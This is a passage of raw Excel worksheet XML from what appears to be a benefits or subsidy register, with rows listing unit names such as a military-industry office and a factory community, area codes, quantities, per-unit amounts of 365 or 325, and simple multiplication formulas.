        <v>45108</v>
      </c>
      <c r="K2594" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2595" customHeight="1" spans="1:11">
      <c r="A2595" s="16" t="s">
        <v>6873</v>
      </c>
      <c r="B2595" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2595" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2595" s="17" t="s">
        <v>6874</v>
      </c>
      <c r="E2595" s="17" t="s">
        <v>6875</v>
      </c>
      <c r="F2595" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2595" s="17">
        <v>1</v>
      </c>
      <c r="H2595" s="18">
        <v>365</v>
      </c>
      <c r="I2595" s="17">
        <f t="shared" si="126"/>
        <v>365</v>
      </c>
      <c r="J2595" s="29">
        <v>45108</v>
      </c>
      <c r="K2595" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2596" customHeight="1" spans="1:11">
      <c r="A2596" s="16" t="s">
        <v>6876</v>
      </c>
      <c r="B2596" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2596" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2596" s="17" t="s">
        <v>4276</v>
      </c>
      <c r="E2596" s="17" t="s">
        <v>3214</v>
      </c>
      <c r="F2596" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2596" s="17">
        <v>1</v>
      </c>
      <c r="H2596" s="18">
        <v>365</v>
      </c>
      <c r="I2596" s="17">
        <f t="shared" si="126"/>
        <v>365</v>
      </c>
      <c r="J2596" s="29">
        <v>45108</v>
      </c>
      <c r="K2596" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2597" customHeight="1" spans="1:11">
      <c r="A2597" s="16" t="s">
        <v>6877</v>
      </c>
      <c r="B2597" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2597" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2597" s="17" t="s">
        <v>6878</v>
      </c>
      <c r="E2597" s="17" t="s">
        <v>6879</v>
      </c>
      <c r="F2597" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2597" s="17">
        <v>2</v>
      </c>
      <c r="H2597" s="18">
        <v>325</v>
      </c>
      <c r="I2597" s="17">
        <f t="shared" si="126"/>
        <v>650</v>
      </c>
      <c r="J2597" s="29">
        <v>45108</v>
      </c>
      <c r="K2597" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2598" customHeight="1" spans="1:11">
      <c r="A2598" s="16" t="s">
        <v>6880</v>
      </c>
      <c r="B2598" s="17" t="str">
        <f>B2597</f>
        <v>军工办</v>
      </c>
      <c r="C2598" s="17" t="str">
        <f>C2597</f>
        <v>红宇厂</v>
      </c>
      <c r="D2598" s="23" t="s">
        <v>6881</v>
      </c>
      <c r="E2598" s="24" t="s">
        <v>6882</v>
      </c>
      <c r="F2598" s="17">
        <f>F2597</f>
        <v>4113210399</v>
      </c>
      <c r="G2598" s="17"/>
      <c r="H2598" s="17"/>
      <c r="I2598" s="17"/>
      <c r="J2598" s="29"/>
      <c r="K2598" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2599" customHeight="1" spans="1:11">
      <c r="A2599" s="16" t="s">
        <v>6883</v>
      </c>
      <c r="B2599" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2599" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2599" s="17" t="s">
        <v>6884</v>
      </c>
      <c r="E2599" s="17" t="s">
        <v>3223</v>
      </c>
      <c r="F2599" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2599" s="17">
        <v>1</v>
      </c>
      <c r="H2599" s="18">
        <v>365</v>
      </c>
      <c r="I2599" s="17">
        <f t="shared" ref="I2599:I2628" si="127">H2599*G2599</f>
        <v>365</v>
      </c>
      <c r="J2599" s="29">
        <v>45108</v>
      </c>
      <c r="K2599" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2600" customHeight="1" spans="1:11">
      <c r="A2600" s="16" t="s">
        <v>6885</v>
      </c>
      <c r="B2600" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2600" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2600" s="17" t="s">
        <v>6886</v>
      </c>
      <c r="E2600" s="17" t="s">
        <v>3256</v>
      </c>
      <c r="F2600" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2600" s="17">
        <v>1</v>
      </c>
      <c r="H2600" s="18">
        <v>365</v>
      </c>
      <c r="I2600" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2600" s="29">
        <v>45108</v>
      </c>
      <c r="K2600" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2601" customHeight="1" spans="1:11">
      <c r="A2601" s="16" t="s">
        <v>6887</v>
      </c>
      <c r="B2601" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2601" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2601" s="17" t="s">
        <v>6888</v>
      </c>
      <c r="E2601" s="17" t="s">
        <v>3419</v>
      </c>
      <c r="F2601" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2601" s="17">
        <v>1</v>
      </c>
      <c r="H2601" s="18">
        <v>365</v>
      </c>
      <c r="I2601" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2601" s="29">
        <v>45108</v>
      </c>
      <c r="K2601" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2602" customHeight="1" spans="1:11">
      <c r="A2602" s="16" t="s">
        <v>6889</v>
      </c>
      <c r="B2602" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2602" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2602" s="17" t="s">
        <v>6890</v>
      </c>
      <c r="E2602" s="17" t="s">
        <v>6869</v>
      </c>
      <c r="F2602" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2602" s="17">
        <v>1</v>
      </c>
      <c r="H2602" s="18">
        <v>365</v>
      </c>
      <c r="I2602" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2602" s="29">
        <v>45108</v>
      </c>
      <c r="K2602" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2603" customHeight="1" spans="1:11">
      <c r="A2603" s="16" t="s">
        <v>6891</v>
      </c>
      <c r="B2603" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2603" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2603" s="17" t="s">
        <v>6892</v>
      </c>
      <c r="E2603" s="17" t="s">
        <v>6893</v>
      </c>
      <c r="F2603" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2603" s="17">
        <v>1</v>
      </c>
      <c r="H2603" s="18">
        <v>365</v>
      </c>
      <c r="I2603" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2603" s="29">
        <v>45108</v>
      </c>
      <c r="K2603" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2604" customHeight="1" spans="1:11">
      <c r="A2604" s="16" t="s">
        <v>6894</v>
      </c>
      <c r="B2604" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2604" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2604" s="17" t="s">
        <v>6895</v>
      </c>
      <c r="E2604" s="17" t="s">
        <v>3355</v>
      </c>
      <c r="F2604" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2604" s="17">
        <v>1</v>
      </c>
      <c r="H2604" s="18">
        <v>365</v>
      </c>
      <c r="I2604" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2604" s="29">
        <v>45108</v>
      </c>
      <c r="K2604" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2605" customHeight="1" spans="1:11">
      <c r="A2605" s="16" t="s">
        <v>6896</v>
      </c>
      <c r="B2605" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2605" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2605" s="17" t="s">
        <v>6897</v>
      </c>
      <c r="E2605" s="17" t="s">
        <v>6869</v>
      </c>
      <c r="F2605" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2605" s="17">
        <v>1</v>
      </c>
      <c r="H2605" s="18">
        <v>365</v>
      </c>
      <c r="I2605" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2605" s="29">
        <v>45108</v>
      </c>
      <c r="K2605" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2606" customHeight="1" spans="1:11">
      <c r="A2606" s="16" t="s">
        <v>6898</v>
      </c>
      <c r="B2606" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2606" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2606" s="17" t="s">
        <v>6899</v>
      </c>
      <c r="E2606" s="17" t="s">
        <v>3381</v>
      </c>
      <c r="F2606" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2606" s="17">
        <v>1</v>
      </c>
      <c r="H2606" s="18">
        <v>365</v>
      </c>
      <c r="I2606" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2606" s="29">
        <v>45108</v>
      </c>
      <c r="K2606" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2607" customHeight="1" spans="1:11">
      <c r="A2607" s="16" t="s">
        <v>6900</v>
      </c>
      <c r="B2607" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2607" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2607" s="17" t="s">
        <v>6901</v>
      </c>
      <c r="E2607" s="17" t="s">
        <v>3214</v>
      </c>
      <c r="F2607" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2607" s="17">
        <v>1</v>
      </c>
      <c r="H2607" s="18">
        <v>365</v>
      </c>
      <c r="I2607" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2607" s="29">
        <v>45108</v>
      </c>
      <c r="K2607" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2608" customHeight="1" spans="1:11">
      <c r="A2608" s="16" t="s">
        <v>6902</v>
      </c>
      <c r="B2608" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2608" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2608" s="17" t="s">
        <v>6903</v>
      </c>
      <c r="E2608" s="17" t="s">
        <v>3226</v>
      </c>
      <c r="F2608" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2608" s="17">
        <v>1</v>
      </c>
      <c r="H2608" s="18">
        <v>365</v>
      </c>
      <c r="I2608" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2608" s="29">
        <v>45108</v>
      </c>
      <c r="K2608" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2609" customHeight="1" spans="1:11">
      <c r="A2609" s="16" t="s">
        <v>6904</v>
      </c>
      <c r="B2609" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2609" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2609" s="17" t="s">
        <v>6905</v>
      </c>
      <c r="E2609" s="17" t="s">
        <v>6906</v>
      </c>
      <c r="F2609" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2609" s="17">
        <v>1</v>
      </c>
      <c r="H2609" s="18">
        <v>365</v>
      </c>
      <c r="I2609" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2609" s="29">
        <v>45108</v>
      </c>
      <c r="K2609" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2610" customHeight="1" spans="1:11">
      <c r="A2610" s="16" t="s">
        <v>6907</v>
      </c>
      <c r="B2610" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2610" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2610" s="17" t="s">
        <v>6908</v>
      </c>
      <c r="E2610" s="17" t="s">
        <v>6909</v>
      </c>
      <c r="F2610" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2610" s="17">
        <v>1</v>
      </c>
      <c r="H2610" s="18">
        <v>365</v>
      </c>
      <c r="I2610" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2610" s="17">
        <v>45261</v>
      </c>
      <c r="K2610" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2611" customHeight="1" spans="1:11">
      <c r="A2611" s="16" t="s">
        <v>6910</v>
      </c>
      <c r="B2611" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2611" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2611" s="17" t="s">
        <v>6911</v>
      </c>
      <c r="E2611" s="17" t="s">
        <v>5088</v>
      </c>
      <c r="F2611" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2611" s="17">
        <v>1</v>
      </c>
      <c r="H2611" s="18">
        <v>365</v>
      </c>
      <c r="I2611" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2611" s="17">
        <v>45261</v>
      </c>
      <c r="K2611" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2612" customHeight="1" spans="1:11">
      <c r="A2612" s="16" t="s">
        <v>6912</v>
      </c>
      <c r="B2612" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2612" s="17" t="s">
        <v>6913</v>
      </c>
      <c r="D2612" s="17" t="s">
        <v>6914</v>
      </c>
      <c r="E2612" s="17" t="s">
        <v>4605</v>
      </c>
      <c r="F2612" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2612" s="17">
        <v>1</v>
      </c>
      <c r="H2612" s="18">
        <v>365</v>
      </c>
      <c r="I2612" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2612" s="17">
        <v>45261</v>
      </c>
      <c r="K2612" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2613" customHeight="1" spans="1:11">
      <c r="A2613" s="16" t="s">
        <v>6915</v>
      </c>
      <c r="B2613" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2613" s="17" t="s">
        <v>6913</v>
      </c>
      <c r="D2613" s="17" t="s">
        <v>6916</v>
      </c>
      <c r="E2613" s="17" t="s">
        <v>4202</v>
      </c>
      <c r="F2613" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2613" s="17">
        <v>1</v>
      </c>
      <c r="H2613" s="18">
        <v>365</v>
      </c>
      <c r="I2613" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2613" s="17">
        <v>45261</v>
      </c>
      <c r="K2613" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2614" customHeight="1" spans="1:11">
      <c r="A2614" s="16" t="s">
        <v>6917</v>
      </c>
      <c r="B2614" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2614" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2614" s="17" t="s">
        <v>6918</v>
      </c>
      <c r="E2614" s="17" t="s">
        <v>6919</v>
      </c>
      <c r="F2614" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2614" s="17">
        <v>1</v>
      </c>
      <c r="H2614" s="18">
        <v>365</v>
      </c>
      <c r="I2614" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2614" s="29">
        <v>45108</v>
      </c>
      <c r="K2614" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2615" customHeight="1" spans="1:11">
      <c r="A2615" s="16" t="s">
        <v>6920</v>
      </c>
      <c r="B2615" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2615" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2615" s="17" t="s">
        <v>6921</v>
      </c>
      <c r="E2615" s="17" t="s">
        <v>6922</v>
      </c>
      <c r="F2615" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2615" s="17">
        <v>1</v>
      </c>
      <c r="H2615" s="18">
        <v>365</v>
      </c>
      <c r="I2615" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2615" s="17" t="s">
        <v>6923</v>
      </c>
      <c r="K2615" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2616" customHeight="1" spans="1:11">
      <c r="A2616" s="16" t="s">
        <v>6924</v>
      </c>
      <c r="B2616" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2616" s="17" t="s">
        <v>6913</v>
      </c>
      <c r="D2616" s="17" t="s">
        <v>6925</v>
      </c>
      <c r="E2616" s="17" t="s">
        <v>4107</v>
      </c>
      <c r="F2616" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2616" s="17">
        <v>1</v>
      </c>
      <c r="H2616" s="18">
        <v>365</v>
      </c>
      <c r="I2616" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2616" s="17" t="s">
        <v>4699</v>
      </c>
      <c r="K2616" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2617" customHeight="1" spans="1:11">
      <c r="A2617" s="16" t="s">
        <v>6926</v>
      </c>
      <c r="B2617" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2617" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2617" s="17" t="s">
        <v>6927</v>
      </c>
      <c r="E2617" s="17" t="s">
        <v>6796</v>
      </c>
      <c r="F2617" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2617" s="17">
        <v>1</v>
      </c>
      <c r="H2617" s="18">
        <v>365</v>
      </c>
      <c r="I2617" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2617" s="17" t="s">
        <v>6923</v>
      </c>
      <c r="K2617" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2618" customHeight="1" spans="1:11">
      <c r="A2618" s="16" t="s">
        <v>6928</v>
      </c>
      <c r="B2618" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2618" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2618" s="17" t="s">
        <v>6929</v>
      </c>
      <c r="E2618" s="17" t="s">
        <v>6930</v>
      </c>
      <c r="F2618" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2618" s="17">
        <v>1</v>
      </c>
      <c r="H2618" s="18">
        <v>365</v>
      </c>
      <c r="I2618" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2618" s="29">
        <v>45566</v>
      </c>
      <c r="K2618" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2619" customHeight="1" spans="1:11">
      <c r="A2619" s="16" t="s">
        <v>6931</v>
      </c>
      <c r="B2619" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2619" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2619" s="17" t="s">
        <v>6932</v>
      </c>
      <c r="E2619" s="17" t="s">
        <v>6933</v>
      </c>
      <c r="F2619" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2619" s="17">
        <v>1</v>
      </c>
      <c r="H2619" s="18">
        <v>365</v>
      </c>
      <c r="I2619" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2619" s="29">
        <v>45536</v>
      </c>
      <c r="K2619" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2620" customHeight="1" spans="1:11">
      <c r="A2620" s="16" t="s">
        <v>6934</v>
      </c>
      <c r="B2620" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2620" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2620" s="17" t="s">
        <v>6935</v>
      </c>
      <c r="E2620" s="17" t="s">
        <v>6796</v>
      </c>
      <c r="F2620" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2620" s="17">
        <v>1</v>
      </c>
      <c r="H2620" s="18">
        <v>365</v>
      </c>
      <c r="I2620" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2620" s="29">
        <v>45597</v>
      </c>
      <c r="K2620" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2621" customHeight="1" spans="1:11">
      <c r="A2621" s="16" t="s">
        <v>6936</v>
      </c>
      <c r="B2621" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2621" s="17" t="s">
        <v>6913</v>
      </c>
      <c r="D2621" s="17" t="s">
        <v>6937</v>
      </c>
      <c r="E2621" s="17" t="s">
        <v>6938</v>
      </c>
      <c r="F2621" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2621" s="17">
        <v>1</v>
      </c>
      <c r="H2621" s="18">
        <v>365</v>
      </c>
      <c r="I2621" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2621" s="29">
        <v>45627</v>
      </c>
      <c r="K2621" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2622" customHeight="1" spans="1:11">
      <c r="A2622" s="16" t="s">
        <v>6939</v>
      </c>
      <c r="B2622" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2622" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2622" s="17" t="s">
        <v>6940</v>
      </c>
      <c r="E2622" s="17" t="s">
        <v>5216</v>
      </c>
      <c r="F2622" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2622" s="17">
        <v>1</v>
      </c>
      <c r="H2622" s="18">
        <v>365</v>
      </c>
      <c r="I2622" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2622" s="29">
        <v>45658</v>
      </c>
      <c r="K2622" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2623" customHeight="1" spans="1:11">
      <c r="A2623" s="16" t="s">
        <v>6941</v>
      </c>
      <c r="B2623" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2623" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2623" s="17" t="s">
        <v>6942</v>
      </c>
      <c r="E2623" s="17" t="s">
        <v>5216</v>
      </c>
      <c r="F2623" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2623" s="17">
        <v>1</v>
      </c>
      <c r="H2623" s="18">
        <v>365</v>
      </c>
      <c r="I2623" s="17">
        <f t="shared" si="127"/>
        <v>365</v>
      </c>
      <c r="J2623" s="29">
        <v>45658</v>
      </c>
      <c r="K2623" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2624" customHeight="1" spans="1:11">
      <c r="A2624" s="16" t="s">
        <v>6943</v>
      </c>
      <c r="B2624" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2624" s="17" t="s">
        <v>6913</v>
      </c>
      <c r="D2624" s="17" t="s">
        <v>6944</v>
      </c>
      <c r="E2624" s="17" t="s">
        <v>6945</v>
      </c>
      <c r="F2624" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2624" s="17">
        <v>2</v>
      </c>
      <c r="H2624" s="18">
        <v>325</v>
      </c>
      <c r="I2624" s="17">
        <f t="shared" si="127"/>
        <v>650</v>
      </c>
      <c r="J2624" s="29">
        <v>45658</v>
      </c>
      <c r="K2624" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2625" customHeight="1" spans="1:22">
      <c r="A2625" s="16" t="s">
        <v>6946</v>
      </c>
      <c r="B2625" s="17" t="str">
        <f>B2624</f>
        <v>军工办</v>
      </c>
      <c r="C2625" s="17" t="str">
        <f>C2624</f>
        <v>向东厂社区</v>
      </c>
      <c r="D2625" s="23" t="s">
        <v>6947</v>
      </c>
      <c r="E2625" s="24" t="s">
        <v>6948</v>
      </c>
      <c r="F2625" s="17" t="str">
        <f>F2624</f>
        <v>4113210699</v>
      </c>
      <c r="G2625" s="17"/>
      <c r="H2625" s="17"/>
      <c r="I2625" s="17"/>
      <c r="J2625" s="17"/>
      <c r="K2625" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2625" s="7"/>
    </row>
    <row r="2626" customHeight="1" spans="1:22">
      <c r="A2626" s="16" t="s">
        <v>6949</v>
      </c>
      <c r="B2626" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2626" s="17" t="s">
        <v>6913</v>
      </c>
      <c r="D2626" s="17" t="s">
        <v>6950</v>
      </c>
      <c r="E2626" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F2626" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2626" s="17">
        <v>1</v>
      </c>
      <c r="H2626" s="18">
        <v>365</v>
      </c>
      <c r="I2626" s="17">
        <f>H2626*G2626</f>
        <v>365</v>
      </c>
      <c r="J2626" s="17" t="s">
        <v>4688</v>
      </c>
      <c r="K2626" s="17" t="s">
        <v>225</v>
      </c>
      <c r="M2626" s="7"/>
      <c r="N2626" s="7"/>
      <c r="O2626" s="7"/>
      <c r="P2626" s="7"/>
      <c r="Q2626" s="7"/>
      <c r="R2626" s="7"/>
      <c r="S2626" s="7"/>
      <c r="T2626" s="7"/>
      <c r="U2626" s="7"/>
      <c r="V2626" s="7"/>
    </row>
    <row r="2627" s="7" customFormat="1" customHeight="1" spans="1:22">
      <c r="A2627" s="16" t="s">
        <v>6951</v>
      </c>
      <c r="B2627" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2627" s="87" t="s">
        <v>6766</v>
      </c>
      <c r="D2627" s="92" t="s">
        <v>6952</v>
      </c>
      <c r="E2627" s="95" t="s">
        <v>4765</v>
      </c>
      <c r="F2627" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2627" s="17">
        <v>1</v>
      </c>
      <c r="H2627" s="18">
        <v>365</v>
      </c>
      <c r="I2627" s="17">
        <f>H2627*G2627</f>
        <v>365</v>
      </c>
      <c r="J2627" s="96" t="s">
        <v>3094</v>
      </c>
      <c r="K2627" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2627" s="8"/>
      <c r="M2627" s="6"/>
      <c r="N2627" s="6"/>
      <c r="O2627" s="6"/>
      <c r="P2627" s="6"/>
      <c r="Q2627" s="6"/>
      <c r="R2627" s="6"/>
      <c r="S2627" s="6"/>
      <c r="T2627" s="6"/>
      <c r="U2627" s="6"/>
      <c r="V2627" s="6"/>
    </row>
    <row r="2628" customHeight="1" spans="1:22">
      <c r="A2628" s="16" t="s">
        <v>6953</v>
      </c>
      <c r="B2628" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2628" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2628" s="17" t="s">
        <v>6954</v>
      </c>
      <c r="E2628" s="17" t="s">
        <v>3220</v>
      </c>
      <c r="F2628" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2628" s="17">
        <v>1</v>
      </c>
      <c r="H2628" s="18">
        <v>365</v>
      </c>
      <c r="I2628" s="17">
        <f>H2628*G2628</f>
        <v>365</v>
      </c>
      <c r="J2628" s="17">
        <v>45108</v>
      </c>
      <c r="K2628" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2628" s="8"/>
      <c r="M2628" s="8"/>
      <c r="N2628" s="8"/>
      <c r="O2628" s="8"/>
      <c r="P2628" s="8"/>
      <c r="Q2628" s="8"/>
      <c r="R2628" s="8"/>
      <c r="S2628" s="8"/>
      <c r="T2628" s="8"/>
      <c r="U2628" s="8"/>
      <c r="V2628" s="8"/>
    </row>
    <row r="2629" s="8" customFormat="1" ht="26" customHeight="1" spans="1:22">
      <c r="A2629" s="16" t="s">
        <v>6955</v>
      </c>
      <c r="B2629" s="20" t="s">
        <v>219</v>
      </c>
      <c r="C2629" s="20" t="s">
        <v>2045</v>
      </c>
      <c r="D2629" s="20" t="s">
        <v>6956</v>
      </c>
      <c r="E2629" s="22" t="s">
        <v>232</v>
      </c>
      <c r="F2629" s="20" t="s">
        <v>289</v>
      </c>
      <c r="G2629" s="21">
        <v>1</v>
      </c>
      <c r="H2629" s="97">
        <v>365</v>
      </c>
      <c r="I2629" s="20">
        <f>H2629*G2629</f>
        <v>365</v>
      </c>
      <c r="J2629" s="22" t="s">
        <v>592</v>
      </c>
      <c r="K2629" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2630" s="8" customFormat="1" ht="26" customHeight="1" spans="1:22">
      <c r="A2630" s="16" t="s">
        <v>6957</v>
      </c>
      <c r="B2630" s="20" t="s">
        <v>219</v>
      </c>
      <c r="C2630" s="20" t="s">
        <v>2037</v>
      </c>
      <c r="D2630" s="20" t="s">
        <v>6958</v>
      </c>
      <c r="E2630" s="22" t="s">
        <v>222</v>
      </c>
      <c r="F2630" s="20" t="s">
        <v>233</v>
      </c>
      <c r="G2630" s="21">
        <v>1</v>
      </c>
      <c r="H2630" s="97">
        <v>365</v>
      </c>
      <c r="I2630" s="20">
        <f t="shared" ref="I2630:I2639" si="128">H2630*G2630</f>
        <v>365</v>
      </c>
      <c r="J2630" s="22" t="s">
        <v>592</v>
      </c>
      <c r="K2630" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2631" s="8" customFormat="1" ht="26" customHeight="1" spans="1:22">
      <c r="A2631" s="16" t="s">
        <v>6959</v>
      </c>
      <c r="B2631" s="20" t="s">
        <v>219</v>
      </c>
      <c r="C2631" s="87" t="s">
        <v>6960</v>
      </c>
      <c r="D2631" s="87" t="s">
        <v>6961</v>
      </c>
      <c r="E2631" s="87" t="s">
        <v>542</v>
      </c>
      <c r="F2631" s="20" t="s">
        <v>266</v>
      </c>
      <c r="G2631" s="21">
        <v>1</v>
      </c>
      <c r="H2631" s="97">
        <v>365</v>
      </c>
      <c r="I2631" s="20">
        <f t="shared" si="128"/>
        <v>365</v>
      </c>
      <c r="J2631" s="22" t="s">
        <v>592</v>
      </c>
      <c r="K2631" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2632" s="8" customFormat="1" ht="26" customHeight="1" spans="1:22">
      <c r="A2632" s="16" t="s">
        <v>6962</v>
      </c>
      <c r="B2632" s="20" t="s">
        <v>219</v>
      </c>
